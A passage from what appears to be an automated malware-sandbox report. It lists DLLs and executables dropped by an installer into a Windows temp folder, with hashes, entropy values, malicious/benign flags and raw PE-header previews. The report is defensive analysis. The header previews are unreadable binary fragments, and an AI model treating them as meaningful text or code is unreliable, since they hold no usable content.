                                                                                                                                                                                                                                        Entropy (8bit):6.464362146605485
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:4X4pQqWJOvXpPF875+6d6YWkysU0z0JqeWPfSWGBJGSjS:W4pQqWJ0875/WkysUUjPfSi
                                                                                                                                                                                                                                        MD5:C6B57BC6559F86B3E34D8AB0FBB628D5
                                                                                                                                                                                                                                        SHA1:654918FA140BB94E8D319157D610998542AA307D
                                                                                                                                                                                                                                        SHA-256:4D46E343E004C470EFE28B81AA1E8F9F27B2C730790C7DA3053EE0DC412C26FF
                                                                                                                                                                                                                                        SHA-512:DA2564682AA94B57B9A6F39A8236754311155000A545443BBBDD5EAB76E5027FCA1D69145C063001694F58885E1E5D1879DFC86741830270578CB2D36658B891
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@.......................................VLV.......+.Rx.R..(.3<6l....`.S|.H@.3N.e.A.R....B.-.k....{..$.JZ.P._v..\..$...c.q...V...Cn.Z..fy...U..9.....,..lg~...B.\1X..Z.L_..X.......Z.........................................PE..L...Ox.R...........!.........P......F..............0..........................,.....R.,...@.........................@4'......#'.......(...............+......0)..#.................................P-".@...............(............................text...cp.......................... ..`.rdata..K...........................@..@.data....F...P'.. ...P'.............@....rsrc.........(......p(.............@..@.reloc.......0).......).............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):316304
                                                                                                                                                                                                                                        Entropy (8bit):6.336244135441085
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:0ofvIGt5PXBbbpIeDAgWU6or1SWIb2oh+mEFSjHp:TIebbye8gWRMIKosmFp
                                                                                                                                                                                                                                        MD5:6B03FCC62387FC2107801EC86D8CB2F9
                                                                                                                                                                                                                                        SHA1:FCCD3492E7225BE0CA8AA485D94995D3B1B979C2
                                                                                                                                                                                                                                        SHA-256:3D4A8CD51FCA82BD7B3AE9710690EACA11FB0D6270142A7FCD6E89EF7DA7AE96
                                                                                                                                                                                                                                        SHA-512:EC93BADF11F218893AF6FA1064C4C593A5C28CE1A0B59FB344AAC7731C55766AA66579890DE6C4D074D4A27DFB80E0BD69D1B99F05BA35EAD44E3626FEB3E87B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........4.D.Z,D.Z,D.Z,!.Y-N.Z,!.^-V.Z,!._-..Z,..Y-M.Z,!.\-E.Z,.._-q.Z,..^-d.Z,!.[-I.Z,D.[,..Z,.S-C.Z,.Z-E.Z,.,E.Z,D..,E.Z,.X-E.Z,RichD.Z,........................PE..d......b.........." ................................................................._....`..........................................b..X....c..x...............$*......./..............p............................................................................text...>........................... ..`.rdata...n.......p..................@..@.data...$(...p.......V..............@....pdata..$*.......,...h..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):308624
                                                                                                                                                                                                                                        Entropy (8bit):6.410929829905318
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:EfWg7a1lD1u6Xddxlnl3fsLvwzohMpXQ3tnIU:Eeg7aj1Dxf3cKoKgBIU
                                                                                                                                                                                                                                        MD5:EA3DEEFB8C59AD0A93F03E9E996D92B2
                                                                                                                                                                                                                                        SHA1:920B502E52EEC9B2002B86539DB6B7DB64E706B2
                                                                                                                                                                                                                                        SHA-256:A1697FEAAE8B0B5306E23A6D9DDB1FB337F479434573DE002E5818AB7412C568
                                                                                                                                                                                                                                        SHA-512:1B942414CA3B46B8E9399D84094432D2A2F89D2467554AE06433CFC9FCA273A804BDFC1BF6067DEB941651A4CB115B9DD7FEDF24EA416579C15712440EB024C2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1k.*u..yu..yu..yaa.x...yaa.xf..yaa.x...y'..xe..y'..x...yaa.xt..y'..x1..yaa.xx..yu..y...y...xs..y...xt..y...yt..y...xt..yRichu..y................PE..d...h..b.........." ................4................................................s....`..........................................?..`...p?..x................*......./..........p...p...............................8............................................text...n........................... ..`.rdata...;.......<..................@..@.data....'...P.......:..............@....pdata...*.......,...L..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............|..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27536
                                                                                                                                                                                                                                        Entropy (8bit):6.7311768831441015
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:wmsg2cM28YFcc9qltpD5+b0pHyYiYa2vCQcAMxkE7:wR7YFJqpIbSHy7Ve6xv
                                                                                                                                                                                                                                        MD5:9BE19993A9A1EC0FAFD72C974F75CA8F
                                                                                                                                                                                                                                        SHA1:0CADF3357CFEBBB10997C8B113A9D7A4E82FECE8
                                                                                                                                                                                                                                        SHA-256:A7037919282076F0DB53627154BCE3F5E787EA16C760FECCA00A5B0614F16121
                                                                                                                                                                                                                                        SHA-512:587B3D31CFF0E7D282136574A9EE5AC687DBEA3997455BC449AF4A24DD7C73EB82813BE3CCF4E6B2BC41360E03F79383972D182DFCF64E783440F622DF01A274
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........%.v.D.%.D.%.D.%R..%.D.%...%.D.%..'%.D.%..&%.D.%...%.D.%:..%.D.%.D.%.D.%:.&%.D.%:..%.D.%...%.D.%:..%.D.%Rich.D.%........PE..L.....*f...........!..... ...".......%.......0...........................................@..........................7..y...,8.......p..P............B...).......... 1..8............................3..@............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........P.......6..............@....qtmetad.....`.......8..............@..P.rsrc...P....p.......:..............@..@.reloc...............>..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):368520
                                                                                                                                                                                                                                        Entropy (8bit):5.930673554971986
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:tUheTc27502HNoekbDhKirPrppRQfbL8ysiZQM:tUheTc2FZ0DkirPbRQl
                                                                                                                                                                                                                                        MD5:F8D78FFA9E4600984086B07C2C04C832
                                                                                                                                                                                                                                        SHA1:9C46C68E5F622E610292AD78D4F7A7CF2FB9E7EC
                                                                                                                                                                                                                                        SHA-256:2ECCA6B05A516090D3E97558ACCA7B89D908E34B7DD5B79DDEF74E6A8CBDE5B7
                                                                                                                                                                                                                                        SHA-512:FEFA25C3869105C36D26FAF1422E3CEF2535B0B34BA995BF6F63360ED61746A98B5D30345064850D89C458EA73F4A252D4E9591B0321BB3E6C5F79C8AEAFD47A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....sx`.........." ..0..r...........F... ........... ..............................\x....`..................................F..O....................|...#..........`E............................................... ............... ..H............text...@q... ...r.................. ..`.rsrc................t..............@..@.reloc...............z..............@..B.................F......H...........4....................D........................................()...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*.0..'..........(*...-..+...(+......(,...s-...}....*..{....*..0..'..........(*...-..+...(+......(,...s-...}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*....0..;........(....(....,,.(....(....,..(.......(*...-..(.......(*...*.*Jr...p.(.....(/...*F.(....,...(.....*
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):208880
                                                                                                                                                                                                                                        Entropy (8bit):6.379249042293217
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:sdByij0ih9GM4lttKrjH1Nhpdw8yDsdKB6Jxy/UaUn+hV:+ByionMKEpdSsNxyMaUn8V
                                                                                                                                                                                                                                        MD5:CCFDDF94281FFAD70EE2D26BB77F8B1C
                                                                                                                                                                                                                                        SHA1:6861A4B16AC5AB05FF594E50D8D63579DAB1D969
                                                                                                                                                                                                                                        SHA-256:9CA14F8D46C25C7C5BE2FFBD070231859906204A775E8B8B3F762630EFD5F721
                                                                                                                                                                                                                                        SHA-512:4BD2D0BA6E3CEF76DE2A0E09D8AD1B27C8D00E55744EC25F37BEF1E4E5E8723468054D1B8C719AB2318BDDA342639447F138995A9BE22FD8C5AF71EECE953BB2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........k...k...k.......k.l.j...k...j...k.l.n...k.l.o...k.l.h...k.!.j...k...j...k.!.n...k.!.k...k.!.....k.......k.!.i...k.Rich..k.........PE..d...T._.........." .........D......d........................................`............`.........................................pN...m......x....@...........'...........P..(.......T.......................(...p...0............................................text............................... ..`.rdata..............................@..@.data...8...........................@....pdata...'.......(..................@..@.rsrc........@......................@..@.reloc..(....P......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):663000
                                                                                                                                                                                                                                        Entropy (8bit):5.94538238272737
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:WG86nitqrIT6Eqk56i258EJsUQUUJ9LBHd2U+:H7itqr3e6d18J9LBHd2F
                                                                                                                                                                                                                                        MD5:4A2FC86ED202B5E7378A7B84F947B2F1
                                                                                                                                                                                                                                        SHA1:6888E73A57D0C999725D57F68E9E16A6F729294F
                                                                                                                                                                                                                                        SHA-256:60605ED6CEFD158EDE7B6B2C2C6804765E8E5EFF602F232F337759C3D5DFD52B
                                                                                                                                                                                                                                        SHA-512:E0FDE10265310D607519FB13FE7114B50E6160487AC0164393E78DD8346FF0BEBDEF9476166A4DB7CB86EEAE44A501F2372DD3AB5EF103323ACB9CD1C02710F8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....X.........." ..0.............^.... ... ....... .......................`............`.....................................O.... ..`................)...@....................................................... ............... ..H............text........ ...................... ..`.rsrc...`.... ......................@..@.reloc.......@......................@..B................@.......H.......Th..................X...T.........................................{....*"..}....*..($...*:.($.....}....*"..(%...*..(....*..{ ...*"..} ...*..{!...*"..}!...*..{"...*"..}"...*..{#...*"..}#...*..{$...*"..}$...*..{*...*>..}*.....(....*..{+...*>..}+.....(....*..{%...*"..}%...*..0...........{&......(....-..*..(....*6..s....}&...*.0...........{'......(....-..*..(....*6..s....}'...*.0...........{(......(....-..*..(....*6..s....}(...*.0...........{)......(....-..*..(....*6..s..
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):98224
                                                                                                                                                                                                                                        Entropy (8bit):6.452201564717313
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
                                                                                                                                                                                                                                        MD5:F34EB034AA4A9735218686590CBA2E8B
                                                                                                                                                                                                                                        SHA1:2BC20ACDCB201676B77A66FA7EC6B53FA2644713
                                                                                                                                                                                                                                        SHA-256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
                                                                                                                                                                                                                                        SHA-512:D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):91024
                                                                                                                                                                                                                                        Entropy (8bit):6.390274185816327
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:JwHNL+3gkqDIECSiSx7ZMAxV421OaPo7Wc3+OZuRfcuK840hw/73AF:yHNL+wk4tBHPo7Wc3+oMfdK84sw/0F
                                                                                                                                                                                                                                        MD5:CF692DD1E4AFA29D6499D1818CA2B6B0
                                                                                                                                                                                                                                        SHA1:7B4E50F82F242EFD817A7C91FAB2600F2A1C57C0
                                                                                                                                                                                                                                        SHA-256:814DB4C14F26B6D7307B99F045B280D1D81E8815EE77E85A2583C710D18890D1
                                                                                                                                                                                                                                        SHA-512:9CF9387A336113523CEB9E87B4C3BB551CE8CE3D15BB2EADF9A2901025E50969DB92A6DA6AD5CC79B394078385BEB186BC26A2B025327CA781AA16F03E4517D8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^...^...^...&|..^...5...^..+...^..+...^..+...^..+...^...5...^...^..R^..6+...^..6+...^..6+...^..6+...^..Rich.^..........................PE..d......b.........." .........l...............................................p............`.............................................P.......,....P.......@..H....4.../...`......0...p...............................8...............X............................text............................... ..`.rdata...K.......L..................@..@.data...8....0......................@....pdata..H....@....... ..............@..@.rsrc........P.......0..............@..@.reloc.......`.......2..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):305552
                                                                                                                                                                                                                                        Entropy (8bit):6.4083242939173815
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:/YjMr0NcUTrHglzwsGqSqosoh/1iZX2ZIR:QjMrWcw0yXqNoT4+IR
                                                                                                                                                                                                                                        MD5:66AD0E987BADD3C3809E012EEF10E246
                                                                                                                                                                                                                                        SHA1:F01A159E82366F127C88A26697416EB8C048AB8F
                                                                                                                                                                                                                                        SHA-256:848E341FD8859CAF431B1B1571AF0D84F07576CDF07298DA93CE9AD98064B03A
                                                                                                                                                                                                                                        SHA-512:87BFEBD0CC8B76BE541DD0838713A10960EFD9FE8AD83B9D54DBCDB9E0655A0F2976759465B8D91B8F9FD0DBA3E4A488F66F970101C5AA66923F1E29E6DE7DD2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............^...^...^..._...^..._}..^..._...^..._...^..._...^..._...^..._...^...^b..^#.._...^#.._...^#.G^...^#.._...^Rich...^................PE..d......b.........." ................................................................5.....`..........................................:..L...<;..d...............<*...z.../..............p...........................P...8...............p............................text............................... ..`.rdata...7.......8..................@..@.data...t'...P......................@....pdata..<*.......,...@..............@..@_RDATA...............l..............@..@.rsrc................n..............@..@.reloc...............p..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):416104
                                                                                                                                                                                                                                        Entropy (8bit):6.435477544411637
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:dMdhFRZYRiV2M05ku9aIRErBCn15rltdSv20zSUu6g3ohXgJAzsGJv6Zj:Sdh7ZoE2h5ku9aiEE15rHEru33o9SQKj
                                                                                                                                                                                                                                        MD5:8718D431F53F2E0426C023654BDA4DAD
                                                                                                                                                                                                                                        SHA1:EC926473285E520F94558B1CBF39EA705A7B9E2D
                                                                                                                                                                                                                                        SHA-256:CB142B6C81E80DFD5FC75627B305A4A7AEB22061550F6A3AF24A6767EAA29305
                                                                                                                                                                                                                                        SHA-512:1F3F4061152B03674D14EFB9C58D84B86F1B88891B9F0A288FE46D0EE9EEDCA2F29328170CADDABF37E695A644FDDDDF5FDDA503B9424E71EFB92867F07581CD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t.............m......m..^....`......`......`.......m......m........S...^`.....^`.....^`.....^`.....Rich............PE..d...J..e.........." .....<..........\...............................................2g....`.........................................P...........x....`...........:...*..h/...p..p....]..p...................._..(...0^..8............P..P............................text....:.......<.................. ..`.rdata.......P.......@..............@..@.data....-..........................@....pdata...:.......<..................@..@_RDATA.......P......................@..@.rsrc........`......................@..@.reloc..p....p......................@..B........................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):204192
                                                                                                                                                                                                                                        Entropy (8bit):6.237429214447198
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:HzS560/yk/J3HssPqqGLgl+zX3FKZzSzvG7mH28dZOjc/2r6MqRo9HYzsQb5878:HqJ3HssPqqGLgl+zXkZzt84a84
                                                                                                                                                                                                                                        MD5:DA9015DF320DCC2EDDEE493E20F639BA
                                                                                                                                                                                                                                        SHA1:5732E5722D2CB5A668ABC19AED6434852D0A4FC8
                                                                                                                                                                                                                                        SHA-256:2294EBB89E749E7145628164913251B563EA6641A6CD1AE03FBCE55DA43F9B17
                                                                                                                                                                                                                                        SHA-512:AF2C0E28966537842817174146DEDEA93A00BDBACF97FFAAECE878E3191D3719BF9A2B1618AB645CB68D2039B4EB16524B309A2BF0D76DDCA6AE09708CD2CBFA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.\.........." ..0......".......... .........a. ....................................`.................................r...O........................_.......................................................... ............... ..H............text....... ...................... ..`.rsrc............ ..................@..@.reloc..............................@..B........................H.......8...0...........h...x............................................((...*.0..-.......~P...- r...p.....()...o*...s+......P...~P...*.~Q...*...Q...*V(....r'..p~Q...o,...*V(....re..p~Q...o,...*V(....r...p~Q...o,...*V(....r...p~Q...o,...*V(....rA..p~Q...o,...*V(....r...p~Q...o,...*V(....r...p~Q...o,...*V(....r%..p~Q...o,...*V(....re..p~Q...o,...*V(....r...p~Q...o,...*V(....r...p~Q...o,...*V(....r!..p~Q...o,...*V(....rW..p~Q...o,...*V(....r...p~Q...o,...*V(....r...p~Q...o,..
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6023664
                                                                                                                                                                                                                                        Entropy (8bit):6.768988071491288
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:hcirJylHYab/6bMJsv6tWKFdu9CLiZxqfg8gwf:+irJylHFb/QMJsv6tWKFdu9CL4xqfg8x
                                                                                                                                                                                                                                        MD5:817520432A42EFA345B2D97F5C24510E
                                                                                                                                                                                                                                        SHA1:FEA7B9C61569D7E76AF5EFFD726B7FF6147961E5
                                                                                                                                                                                                                                        SHA-256:8D2FF4CE9096DDCCC4F4CD62C2E41FC854CFD1B0D6E8D296645A7F5FD4AE565A
                                                                                                                                                                                                                                        SHA-512:8673B26EC5421FCE8E23ADF720DE5690673BB4CE6116CB44EBCC61BBBEF12C0AD286DFD675EDBED5D8D000EFD7609C81AAE4533180CF4EC9CD5316E7028F7441
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......D.............................UJ......................................................W.....,..................r....................Rich............PE..d...;._.........." ..........-.......-......................................`\.....x.\...`...........................................L..O....T...... \.......U.. ....[......0\..%..,.H.T.....................H.(.....H.0............./.H............................text............................... ..`.rdata..F7%.../..8%.................@..@.data...x....PT..\...6T.............@....pdata... ....U.."....T.............@..@.qtmimed.....0W.......V.............@..P.rsrc........ \.......[.............@..@.reloc...%...0\..&....[.............@..B........................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1125776
                                                                                                                                                                                                                                        Entropy (8bit):6.4092046609596345
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:IrAq6D1711KHSPJuxXG4WyvHA2hU3TZlHMHE7GHGHS+HgH/HoHsH5Wr6Pq7Gsjet:IrAq6D1711KHSPwx24WyvHA2hU3TZlHM
                                                                                                                                                                                                                                        MD5:A3A691724ED0DE2B86261B67AAB1C8D5
                                                                                                                                                                                                                                        SHA1:AC7EC2AFA40930B947B4838B7FC03C5A12B6A573
                                                                                                                                                                                                                                        SHA-256:6F0BAC85CEFC7B4223750418A4EF3CFD6F874433DB4A8C1A0DC1651BB6395E88
                                                                                                                                                                                                                                        SHA-512:938C249E329FA6EE7923CA4563F6E11C24133093EA5E73FF2FDD3BC073AA82B407D9CD0828A4F7B1D31ADEDDEFB375651C3E429078A2735717FFA25E0A157ECB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L......^...........!.....@...................P....@.................................;................................ ..j.......m*...0...................G...........................................................................................text....@.......:.................. ..`.data........P.......@..............@....tls.................8..............@....idata...0.......,...:..............@..@.edata....... .......f..............@..@.rsrc........0.......j..............@..@
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):91024
                                                                                                                                                                                                                                        Entropy (8bit):6.392900904102728
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:hmtFJlpHwE3mKEUs7Z5YxPwlQOaYU7jw52/xPuiXC/8K8jcYa1o/7kIf:hmtFzpF2AHYU7jw52/xGiXC0K8Qx+/Xf
                                                                                                                                                                                                                                        MD5:419F5B0AD8C7A997FF45B0E78B8EB992
                                                                                                                                                                                                                                        SHA1:93785EF8A6CB10746843728933A41178D5C880C7
                                                                                                                                                                                                                                        SHA-256:899C543564E34D7796148F5E57D727879D180444CB193647C5BB0C6A009B46A0
                                                                                                                                                                                                                                        SHA-512:5E5336BCC2BAEC98551AE64B32EF89CFC68FF4B64A5802529E58120D3E682C8AD64426F1DA92838A1CFCC050C6B071D14A8C6723E0A4FAFD6DC8F6E46B93A683
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^...^...^...&|..^...5...^..+...^..+...^..+...^..+...^...5...^...^..R^..6+...^..6+...^..6+...^..6+...^..Rich.^..........................PE..d......b.........." .........l...............................................p............`.............................................\...,...,....P.......@..H....4.../...`......0...p...............................8...............X............................text............................... ..`.rdata...K.......L..................@..@.data...8....0......................@....pdata..H....@....... ..............@..@.rsrc........P.......0..............@..@.reloc.......`.......2..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1667544
                                                                                                                                                                                                                                        Entropy (8bit):5.96495732757551
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:/cXMn2kbBdCEtvrPJIs4RbYI3kirPbRQe3e6d18bBHdC:/cc2k7pS
                                                                                                                                                                                                                                        MD5:43B71C0A50EAF646CDF3BC7A0672B3E2
                                                                                                                                                                                                                                        SHA1:56CC102402BB5FD86D8E5875050AFB7C71A6090D
                                                                                                                                                                                                                                        SHA-256:CC50A7B0DF5274317D1B6A030E3AC33815F1C9D3A0EF813FFEC405E5D844D420
                                                                                                                                                                                                                                        SHA-512:99BFD19E88F38D9BA80BEEC4C31FECEF4C46657098809DADD3FFAC8A3325D59335CEF2BC195124AA8D3933A25A66EE99CB27C1CDB8990E9E0F54577847B486CD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...Y.i..........."...0..@............... .....@..... ...............................o....`...@......@............... ...............................`...............H...)...........^..8............................................................ ..H............text...\?... ...@.................. ..`.rsrc........`.......B..............@..@........................................H.......h)..<$...........M..............................................J.r...p.s....(....*Js....%o....o....&*..(....*...0..F........r!..p}.....r...p}.....(....}.....r...p}......}.....(.....(.....(....*...0..c.......r!..p(....rK..p(......i..i..2.../.(....o....+/.(.....~.....~....(....(........(....(....o......&..*.........__.......0..@........s....o ...~....%-.&~......"...s!...%.....(...+(...+%-.&.*o$...*.0..4.......r...p. ....s%........ .....(....&.o&......o&.......*........$*......
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):63960
                                                                                                                                                                                                                                        Entropy (8bit):5.985053093940967
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:UuH8cM6INO6I16K2pa2slcJCKKSg8gD7mN9f9xg8:UuM7NO6IOpa2ocJCSDgDe9E8
                                                                                                                                                                                                                                        MD5:E1AD97477B7DCF44C45617AF1C5F42A7
                                                                                                                                                                                                                                        SHA1:3C4EE0BDAEE0D2F5AA2FEC0B123941E4EF502A7B
                                                                                                                                                                                                                                        SHA-256:715B44973C9999CE10DA2EAA29FA566CCFDFA6E013F839CD51BD8D54E470E1AF
